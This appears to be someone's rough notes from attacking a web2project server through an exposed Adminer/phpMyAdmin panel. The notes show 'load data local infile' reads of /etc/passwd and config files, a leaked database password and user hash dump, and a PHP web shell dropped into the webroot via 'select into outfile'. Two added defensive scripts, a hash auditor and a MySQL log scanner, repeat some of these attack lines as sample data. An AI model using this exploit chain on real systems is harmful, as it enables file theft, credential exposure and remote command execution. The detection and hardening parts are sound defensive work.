regular nmap:

Discovered open port 3306/tcp on 172.16.10.44
Discovered open port 80/tcp on 172.16.10.44
Discovered open port 22/tcp on 172.16.10.44
mysql -u admin -p -h 172.16.10.44
Enter password: 
ERROR 1130 (HY000): Host '172.16.10.250' is not allowed to connect to this MariaDB server

web2project

Version 3.3.66

sqlmap says login post has no injectable parameters.

nikto found phpmyadmin / adminer 4.6.2

default creds for phpmyadmin aren’t working:

mysql> CREATE DATABASE web2project;
Query OK, 1 row affected (0.00 sec)
mysql> GRANT INSERT, DELETE, UPDATE, SELECT ON web2project.* TO 'w2puser'@'localhost' IDENTIFIED BY 'sillyboy25';
Query OK, 0 rows affected (0.02 sec)
mysql> exit
Access denied for user 'w2puser'@'localhost' (using password: YES)

found .gitignore file:

/includes/*config.php
/reporting.tmp
/tmp.*
/unit_tests/reports/
/.idea/
/files/*
/docs/*
vendor/**

tests/reports/**

promising:

https://www.immuniweb.com/advisory/HTB23213

phpmyadmin:

load data local infile '/etc/passwd'
into table admirer.ferm1
fields terminated by "\n"
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
rsauns-adm:x:1000:1000:,,,:/home/rsauns-adm:/bin/bash
Error in query (7890): Can't find file '/home/rsauns-adm/.ssh/id_rsa'.
Error in query (7890): Can't find file '/var/www/html/web2project-version3.3.66/index.php'.
Error in query (7890): Can't find file '/var/www/html/web2project-version3.3/index.php'.

fuckin’ hell, this worked: (how did I know this would work the last time?)

load data local infile '../index.php'
into table admirer.ferm1
fields terminated by "\n"

but still, no creds.

finally found it in ../includes/config.php

$w2Pconfig['dbtype'] = 'mysqli'; // ONLY MySQL is supported at present
$w2Pconfig['dbchar'] = 'utf8'; // The character set used in the database
$w2Pconfig['dbhost'] = 'localhost';
$w2Pconfig['dbname'] = 'web2'; // Your web2Project Database Name
$w2Pconfig['dbuser'] = 'web2_user'; // Your MySQL Username
$w2Pconfig['dbpass'] = 'QYfkvLtaBeAXVtBnVyANgWV9'; // Your MySQL Password
1	1	admin	$2y$10$oNAP8HNktAqXfiSV34knS.1sYggex7Q55iU3NNMAvRhYPRcpmPJzK	0	1	 	0	0	0
2	2	web2_user	$2y$10$GzuN16/D9nJ4svXVs5kyWOMu3aLitzbNKePA8BrHGTxshWxw3fXNe	0	0	 	0	0	0
3	3	wadler	bf3dcca194bf716891d2357827af25af	0	0	 	0	0	0
4	4	rsauns	c5eb3cd54b9988df058d71aa166bbd5d	0	0	NULL	0	0	0
5	5	thudson	932405c12fb8cb3c83cc4fcb9bae0fb8	0	0	NULL	0	0	0
6	6	trivera	fa03b70cec2588dab70bb68fe4a73b47
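The user dump above mixes bcrypt hashes ($2y$...) with 32-character hex values shaped like unsalted MD5. The script below is an added example, not part of these notes or of web2project: it parses a tab-separated users dump in the same layout (user_id, contact_id, username, hash, ...), classifies each hash by format, and lists accounts whose stored hash is not a modern slow hash and should be rehashed on next login. The sample rows and hash values are constructed, not the dump shown above.

```python
"""Audit stored password hashes by format (added example, constructed data)."""
import re

# Constructed rows in the same tab-separated layout as a users-table dump:
# user_id, contact_id, username, password hash, then flags we ignore.
# The bcrypt strings are synthetic 60-char values; the 32-hex one is md5("password").
SAMPLE_USER_DUMP = """\
1\t1\tadmin\t$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ12345\t0\t1
2\t2\tsvc_user\t$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ54321\t0\t0
3\t3\talice\t5f4dcc3b5aa765d61d8327deb882cf99\t0\t0
4\t4\tbob\t{SHA}qUqP5cyxm6YcTAhz05Hph5gvu9M=\t0\t0
5\t5\tcarol\tplaintext-hunter2\t0\t0
"""

# (format name, pattern, acceptable for password storage?)
# Only salted, deliberately slow hashes are accepted; bare hex digests of
# fast algorithms (MD5/SHA-1/SHA-256) are flagged regardless of length.
HASH_FORMATS = [
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), True),
    ("argon2", re.compile(r"^\$argon2(?:id|i|d)\$"), True),
    ("md5-hex", re.compile(r"^[0-9a-f]{32}$", re.I), False),
    ("sha1-hex", re.compile(r"^[0-9a-f]{40}$", re.I), False),
    ("sha256-hex", re.compile(r"^[0-9a-f]{64}$", re.I), False),
]


def classify_hash(value):
    """Return (format_name, acceptable) for one stored hash string."""
    for name, rx, acceptable in HASH_FORMATS:
        if rx.match(value):
            return name, acceptable
    # Anything else is either an unknown scheme or not a hash at all.
    return "unrecognised", False


def parse_user_dump(text):
    """Parse tab-separated rows; keep only the columns the audit needs."""
    rows = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) < 4 or not fields[0].isdigit():
            continue
        rows.append({"user_id": int(fields[0]),
                     "username": fields[2],
                     "hash": fields[3]})
    return rows


def accounts_needing_rehash(text):
    """List (username, format) for every account not on an acceptable hash."""
    flagged = []
    for row in parse_user_dump(text):
        fmt, acceptable = classify_hash(row["hash"])
        if not acceptable:
            flagged.append((row["username"], fmt))
    return flagged


if __name__ == "__main__":
    for username, fmt in accounts_needing_rehash(SAMPLE_USER_DUMP):
        print(f"{username}: stored as {fmt}, rehash on next login")
```

Run as-is to print the flagged accounts; in a real audit, feed it `SELECT user_id, contact_id, user_username, user_password ... INTO OUTFILE`-style exports or a `mysqldump --tab` file with the same column order.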

created table ‘wow’ with column ‘wow’, inserted value <?php system($_REQUEST['cmd']);?> into wow.wow loaded file into ‘/var/www/html/wow.php’ … but that’s really not the webroot.

eh... so I just grabbed the hash from /var/www/hash.txt

trying to get shell

Error in query (7890): Can't find file '/var/www/index.php'.
Error in query (7890): Can't find file '/var/www/web2project/index.php'. 
Error in query (7890): Can't find file '/var/www/web2project-3.3/index.php'. 
Error in query (7890): Can't find file '/var/www/web2project-version3.3/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-version-3.3/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-version-3.3.66/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-3.3.66/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-version3.3.66/index.php'. 

from /etc/apache2/apache2.conf

<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>
 
<Directory /usr/share>
	AllowOverride None
	Require all granted
</Directory>
 
<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride None
	Require all granted
</Directory>
 
#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>

from /etc/apache2/sites-available/000-default.conf

ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

from /etc/apache2/sites-enabled/000-default.conf

ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/todo

…yep, found it.

created table forum_user with column ‘wow’, inserted value <?php system($_REQUEST['cmd']);?> into forum_user

insert into `forum_user`(wow) values("<?php system($_REQUEST['cmd']);?>");

loaded into ‘/var/www/html/todo/wow.php’

select wow into outfile '/var/www/html/todo/wow.php' from forum_user;

didn’t get a shell back but meh, just a matter of time.
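Everything that worked in these notes ran through two MySQL file features: `load data local infile` (the DB client, here the PHP process behind Adminer/phpMyAdmin, reads a file on its own host, which is why the relative `../index.php` worked while `/home/rsauns-adm/.ssh/id_rsa` did not) and `select ... into outfile` (mysqld writes a file wherever its own user may write, with no `secure_file_priv` restriction). The script below is an added example, not code from these notes or from MySQL/MariaDB: it scans general-query-log lines for those statements, rates a write whose target has a script extension as critical, and checks `SHOW GLOBAL VARIABLES` output for the two settings that close the hole (`local_infile=0`, `secure_file_priv` set to a dedicated directory or NULL). The log lines and variable dictionaries are constructed samples.

```python
"""Detect file read/write abuse in MySQL/MariaDB query logs and check the
server settings that allow it (added example, constructed sample data)."""
import re

# Constructed lines in the MySQL general query log layout:
# <time>\t<thread id> <command>\t<argument>
SAMPLE_GENERAL_LOG = """\
2024-01-01T10:00:01.000000Z\t   12 Connect\tweb2_user@localhost on web2 using TCP/IP
2024-01-01T10:00:02.000000Z\t   12 Query\tSELECT * FROM users WHERE user_id = 3
2024-01-01T10:00:03.000000Z\t   12 Query\tload data local infile '../includes/config.php' into table admirer.ferm1 fields terminated by "\\n"
2024-01-01T10:00:04.000000Z\t   12 Query\tselect wow into outfile '/var/www/html/todo/wow.php' from forum_user
2024-01-01T10:00:05.000000Z\t   13 Query\tSELECT COUNT(*) FROM tasks
2024-01-01T10:00:06.000000Z\t   13 Query\tSELECT LOAD_FILE('/etc/passwd')
"""

LINE_RE = re.compile(r"^(?P<time>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# (rule name, statement pattern capturing the file path, what it does)
RULES = [
    ("LOAD DATA LOCAL INFILE",
     re.compile(r"\bLOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']*)'", re.I),
     "client-side file read"),
    ("LOAD DATA INFILE",
     re.compile(r"\bLOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?INFILE\s+'([^']*)'", re.I),
     "server-side file read"),
    ("LOAD_FILE",
     re.compile(r"\bLOAD_FILE\s*\(\s*'([^']*)'", re.I),
     "server-side file read"),
    ("INTO OUTFILE/DUMPFILE",
     re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']*)'", re.I),
     "server-side file write"),
]

# A file written with one of these extensions under a web root is a webshell drop.
SCRIPT_EXT = (".php", ".phtml", ".phar", ".jsp", ".aspx")


def scan_general_log(log_text):
    """Return one finding dict per file-touching statement, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        stmt = m.group("arg")
        for name, rx, kind in RULES:
            hit = rx.search(stmt)
            if not hit:
                continue
            path = hit.group(1)
            severity = "high"
            if kind.endswith("write") and path.lower().endswith(SCRIPT_EXT):
                severity = "critical"
            findings.append({"thread": int(m.group("thread")), "rule": name,
                             "kind": kind, "path": path, "severity": severity})
    return findings


def check_file_variables(variables):
    """variables: {name: value} as shown by SHOW GLOBAL VARIABLES. Returns issues."""
    issues = []
    if variables.get("local_infile", "OFF").upper() == "ON":
        issues.append("local_infile=ON: any client, including a web DB admin tool, "
                      "can read files on the client host; set local_infile=0")
    sfp = variables.get("secure_file_priv")
    # MySQL reports NULL (feature disabled) as the string 'NULL'; an empty
    # string means no path restriction at all, which is the weak setting.
    if sfp is None or sfp == "":
        issues.append("secure_file_priv is empty: INTO OUTFILE / LOAD DATA INFILE / "
                      "LOAD_FILE may use any path mysqld can access; set a dedicated "
                      "directory or NULL")
    return issues


# Constructed variable sets: the weak defaults beside a hardened configuration.
WEAK_VARS = {"local_infile": "ON", "secure_file_priv": ""}
HARDENED_VARS = {"local_infile": "OFF", "secure_file_priv": "/var/lib/mysql-files/"}

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_GENERAL_LOG):
        print(f"[{f['severity']}] thread {f['thread']}: {f['rule']} -> {f['path']} ({f['kind']})")
    for issue in check_file_variables(WEAK_VARS):
        print("config:", issue)
```

The general log is off by default and costly on busy servers; the same rules apply unchanged to the audit plugin or to proxy/WAF query logs, and the variable check can be fed from `mysql -N -e "SHOW GLOBAL VARIABLES LIKE 'local_infile'"` and `... LIKE 'secure_file_priv'`. Revoking the FILE privilege from application accounts (the notes' `web2_user` had it) removes the server-side read/write path entirely.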